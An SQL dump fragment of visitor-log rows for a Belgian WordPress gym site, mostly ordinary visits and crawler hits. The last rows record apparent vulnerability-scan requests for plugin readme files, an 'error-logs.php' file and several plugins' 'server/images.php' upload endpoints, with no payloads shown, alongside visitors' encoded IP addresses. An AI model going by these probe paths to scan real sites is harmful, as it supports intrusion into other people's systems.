(74005, 1496141692.840673, 3154485134, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.0 Mobile/14F89 Safari/602.1'),
(74006, 1496144351.888467, 3652617366, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/feed/', '', 'Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)'),
(74007, 1496144371.332371, 96753435, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)'),
(74008, 1496145081.206062, 3154485134, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.0 Mobile/14F89 Safari/602.1'),
(74009, 1496145081.776524, 3154485134, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74010, 1496145082.921941, 3154485134, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74011, 1496145083.533095, 3154485134, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74012, 1496145084.066407, 3154485134, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74013, 1496145084.608672, 3154485134, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74014, 1496145085.252614, 3154485134, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74015, 1496145085.737538, 3154485134, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74016, 1496145086.235244, 3154485134, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74017, 1496145086.754552, 3154485134, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74018, 1496145087.302658, 3154485134, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74019, 1496156970.383652, 1538774996, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.be/', 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0'),
(74020, 1496156971.941549, 1538774996, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0'),
(74021, 1496156989.358857, 1538774996, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/en-images/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0'),
(74022, 1496158750.153662, 1356207873, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.fr/', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_2_1 like Mac OS X) AppleWebKit/602.4.6 (KHTML, like Gecko) Version/10.0 Mobile/14D27 Safari/602.1'),
(74023, 1496164300.207624, 1538656104, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_5) AppleWebKit/603.2.4 (KHTML, like Gecko)'),
(74024, 1496164300.852445, 1538656104, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(74025, 1496164301.344002, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(74026, 1496164301.858881, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(74027, 1496164302.441988, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(74028, 1496164302.955379, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(74029, 1496164303.526175, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(74030, 1496164304.090019, 1538656104, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_0 like Mac OS X) AppleWebKit/602.1.38 (KHTML, like Gecko) Version/10.0 Mobile/14A300 Safari/602.1'),
(74031, 1496164304.584232, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(74032, 1496164305.092054, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(74033, 1496164305.553264, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(74034, 1496164306.170660, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(74035, 1496164306.713822, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(74036, 1496164307.323140, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(74037, 1496166985.126228, 1123631300, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(74038, 1496168576.553052, 2637637376, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(74039, 1496168577.085390, 2637637376, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(74040, 1496172490.542779, 1374769563, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.0 Mobile/14F89 Safari/602.1'),
(74041, 1496172491.348500, 1374769563, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74042, 1496172491.873876, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74043, 1496172492.434838, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74044, 1496172493.048046, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74045, 1496172493.596937, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74046, 1496172494.181990, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74047, 1496172494.678736, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74048, 1496172495.214694, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74049, 1496172495.783438, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74050, 1496172496.287226, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74051, 1496174979.069877, 3154459133, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.0 Mobile/14F89 Safari/602.1'),
(74052, 1496174979.853269, 3154459133, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74053, 1496174980.367914, 3154459133, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74054, 1496174980.961735, 3154459133, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74055, 1496174981.513887, 3154459133, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74056, 1496174982.045068, 3154459133, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74057, 1496174982.649073, 3154459133, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74058, 1496174983.152806, 3154459133, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74059, 1496174983.669423, 3154459133, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74060, 1496174984.279696, 3154459133, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74061, 1496174984.769483, 3154459133, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74062, 1496178009.176039, 1837280593, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.2.5 (KHTML, like Gecko)'),
(74063, 1496178010.249038, 1837280593, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(74064, 1496178010.766939, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(74065, 1496178011.686997, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(74066, 1496178012.206794, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(74067, 1496178012.812147, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(74068, 1496178013.279286, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(74069, 1496178013.752873, 1837280593, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_0 like Mac OS X) AppleWebKit/602.1.38 (KHTML, like Gecko) Version/10.0 Mobile/14A300 Safari/602.1'),
(74070, 1496178014.180396, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(74071, 1496178014.628352, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(74072, 1496178015.118198, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(74073, 1496178015.547647, 1837280593, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.2.5 (KHTML, like Gecko) Version/10.1.1 Safari/603.2.5'),
(74074, 1496178015.716247, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(74075, 1496178016.409261, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(74076, 1496178017.418813, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.2.5 (KHTML, like Gecko) Version/10.1.1 Safari/603.2.5'),
(74077, 1496178017.422199, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(74078, 1496178017.428353, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(74079, 1496178017.873851, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(74080, 1496182722.884477, 1123631300, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(74081, 1496182723.321511, 1123631300, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(74082, 1496190034.983878, 1815808070, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)'),
(74083, 1496190047.635672, 1815808070, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)'),
(74084, 1496190050.507243, 1815808070, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)'),
(74085, 1496190067.230767, 1815808070, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)'),
(74086, 1496191499.882813, 1123631300, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(74087, 1496192752.127859, 872367984, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/hello-world/feed/', '', 'Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)'),
(74088, 1496195240.456937, 2150924393, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/wysija-newsletters/readme.txt', 'http://crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'),
(74089, 1496195914.599531, 3024883478, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (Windows NT 5.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2'),
(74090, 1496195914.602747, 3024883610, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (Windows NT 5.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2'),
(74091, 1496196043.416130, 3024883617, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/contact/', '', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'),
(74092, 1496197674.273666, 676177711, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(74093, 1496198231.112875, 1123631300, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(74094, 1496212836.296661, 1539837019, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/', 'http://crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 5.1; WOW64; x64) AppleWebKit/532.82.45 (KHTML, like Gecko) Chrome/57.4.9492.5765 Safari/534.53 OPR/44.5.1215.6587'),
(74095, 1496212838.918918, 1539837019, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/', 'http://crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 5.1; WOW64; x64) AppleWebKit/532.82.45 (KHTML, like Gecko) Chrome/57.4.9492.5765 Safari/534.53 OPR/44.5.1215.6587'),
(74096, 1496215025.111806, 1582084616, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.es/', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.2.5 (KHTML, like Gecko) Version/10.1.1 Safari/603.2.5'),
(74097, 1496215026.649284, 1582084616, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.2.5 (KHTML, like Gecko) Version/10.1.1 Safari/603.2.5'),
(74098, 1496215046.905872, 1582084616, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.2.5 (KHTML, like Gecko) Version/10.1.1 Safari/603.2.5'),
(74099, 1496215065.416104, 1582084616, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/contact/', 'http://www.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.2.5 (KHTML, like Gecko) Version/10.1.1 Safari/603.2.5'),
(74100, 1496218389.918549, 1538728574, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko'),
(74101, 1496218391.375470, 1538728574, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko'),
(74102, 1496218410.303418, 1538728574, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/le-cross-training/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko'),
(74103, 1496218411.855911, 1538728574, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko'),
(74104, 1496218442.288761, 1538728574, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/notre-philosophie/', 'http://www.crosstrainingcenter.be/le-cross-training/', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko'),
(74105, 1496218447.735674, 1538728574, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/notre-philosophie/', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko'),
(74106, 1496222400.826556, 1123631171, 0, 0, 1, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(74107, 1496222401.898700, 1123631300, 0, 0, 1, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(74108, 1496224739.814075, 782622681, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/wp-symposium/readme.txt', 'http://crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36'),
(74109, 1496232552.825657, 2637637376, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(74110, 1496232552.842440, 2637637376, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(74111, 1496232708.275741, 1837280593, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.2.5 (KHTML, like Gecko) Version/10.1.1 Safari/603.2.5'),
(74112, 1496234436.893078, 2996488252, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(74113, 1496234441.200135, 2996488256, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances/', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(74114, 1496234445.131475, 2996488256, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(74115, 1496234515.191716, 1374769563, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.0 Mobile/14F89 Safari/602.1'),
(74116, 1496234515.745302, 1374769563, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74117, 1496234516.173060, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74118, 1496234516.610069, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74119, 1496234517.027353, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74120, 1496234517.429922, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74121, 1496234517.908960, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74122, 1496234518.420977, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74123, 1496234518.941611, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74124, 1496234519.355740, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74125, 1496234519.865297, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74126, 1496238671.001839, 2499535434, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/comments/feed/', '', 'AwarioRssBot/1.0 (+https://awario.com/bots.html; bots@awario.com)'),
(74127, 1496239586.952390, 760206499, 0, 1, 0, 0, 1, 'http://crosstrainingcenter.be/error-logs.php', 'http://crosstrainingcenter.be/error-logs.php', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)'),
(74128, 1496246946.121926, 2499535434, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/feed/', '', 'AwarioRssBot/1.0 (+https://awario.com/bots.html; bots@awario.com)'),
(74129, 1496248937.747363, 1539837611, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/zen-mobile-app-native/server/images.php', '', ''),
(74130, 1496248938.571703, 1539837611, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/webapp-builder/server/images.php', '', ''),
(74131, 1496248939.450021, 1539837611, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/wp2android-turn-wp-site-into-android-app/server/images.php', '', ''),
